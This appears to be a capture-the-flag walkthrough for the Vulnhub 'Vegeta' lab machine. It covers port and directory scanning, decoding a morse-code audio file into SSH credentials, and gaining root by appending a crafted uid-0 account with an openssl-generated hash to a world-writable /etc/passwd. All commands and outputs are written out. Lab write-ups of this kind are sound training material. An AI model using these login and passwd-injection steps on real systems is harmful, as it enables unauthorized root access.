Vulnhub - Vegeta

Hi all, let’s pwn it!

You can find the machine there > Vegeta

Enumeration/Reconnaissance

Let’s start always with nmap.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
$ ip=192.168.1.7
$ nmap -p- --min-rate 10000 $ip
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-16 17:54 EEST
Nmap scan report for vegeta.zte.com.cn (192.168.1.7)
Host is up (0.00018s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:6A:20:00 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 2.34 seconds
$ nmap -p 22,80 -sC -sV -oN nmap/initial $ip
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-16 17:55 EEST
Nmap scan report for vegeta.zte.com.cn (192.168.1.7)
Host is up (0.00038s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 1f:31:30:67:3f:08:30:2e:6d:ae:e3:20:9e:bd:6b:ba (RSA)
|   256 7d:88:55:a8:6f:56:c8:05:a4:73:82:dc:d8:db:47:59 (ECDSA)
|_  256 cc:de:de:4e:84:a8:91:f5:1a:d6:d2:a6:2e:9e:1c:e0 (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 08:00:27:6A:20:00 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Let’s run gobuster on it:

1
2
3
4
5
6
7
8
9
10
$ gobuster dir -q -u http://$ip/ -w /root/Documents/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-big.txt -x php,txt,html -o gobuster.txt
/index.html (Status: 200)
/img (Status: 301)
/login.php (Status: 200)
/image (Status: 301)
/admin (Status: 301)
/manual (Status: 301)
/robots.txt (Status: 200)
/server-status (Status: 403)
/bulma (Status: 301)

Decoding morse code audio - shell as trunks

/bulma gives us a .wav file let’s download it and listen to it.

1
$ wget -q http://192.168.1.7/bulma/hahahaha.wav

All we can hear is “beep boop” that’s probably morse code. I found an online decoder

TRUNKS PASSWORD : US3R(S IN DOLLARS SYMBOL)

That’s probably a system user and his password. Let’s give it a go with ssh:

1
2
3
4
5
6
7
8
9
$ sshpass -p 'u$3r' ssh trunks@$ip 'ls -la'
total 28
drwxr-xr-x 3 trunks trunks 4096 Jun 28 21:32 .
drwxr-xr-x 3 root   root   4096 Jun 28 17:37 ..
-rw------- 1 trunks trunks  382 Jun 28 21:36 .bash_history
-rw-r--r-- 1 trunks trunks  220 Jun 28 17:37 .bash_logout
-rw-r--r-- 1 trunks trunks 3526 Jun 28 17:37 .bashrc
drwxr-xr-x 3 trunks trunks 4096 Jun 28 19:45 .local
-rw-r--r-- 1 trunks trunks  807 Jun 28 17:37 .profile

trunks -> root

Perfect, now privesc is simple. We have to exploit writable /etc/passwd:

1
2
trunks@Vegeta:~$ ls -la /etc/passwd
-rw-r--r-- 1 trunks root 1486 Jun 28 21:23 /etc/passwd

Let’s generate a password first:

1
2
$ openssl passwd -6 -salt xyz pwned    
$6$xyz$5I4IoAWqNNcGCYvBCeIz0UZr5NoOPvvHrwR9B1AX7.1fYnHX3clTDW9YRVi3TYivXiJ8Mb8clrGt7.gTxZGXb1

Now the format of /etc/passwd is this:

r000t:$6$xyz$5I4IoAWqNNcGCYvBCeIz0UZr5NoOPvvHrwR9B1AX7.1fYnHX3clTDW9YRVi3TYivXiJ8Mb8clrGt7.gTxZGXb1:0:0:comment:/root:/bin/bash

Let’s add it:

1
2
3
4
5
6
trunks@Vegeta:~$ echo 'r000t:$6$xyz$5I4IoAWqNNcGCYvBCeIz0UZr5NoOPvvHrwR9B1AX7.1fYnHX3clTDW9YRVi3TYivXiJ8Mb8clrGt7.gTxZGXb1:0:0:comment:/root:/bin/bash' >> /etc/passwd
trunks@Vegeta:~$ su - r000t
Password: 
root@Vegeta:~# whoami;id
root
uid=0(root) gid=0(root) groups=0(root)

The flag:

1
2
3
4
5
root@Vegeta:~# cat root.txt 

Hurray you got root

Share your screenshot in telegram : https://t.me/joinchat/MnPu-h3Jg4CrUSCXJpegNw

Silly :P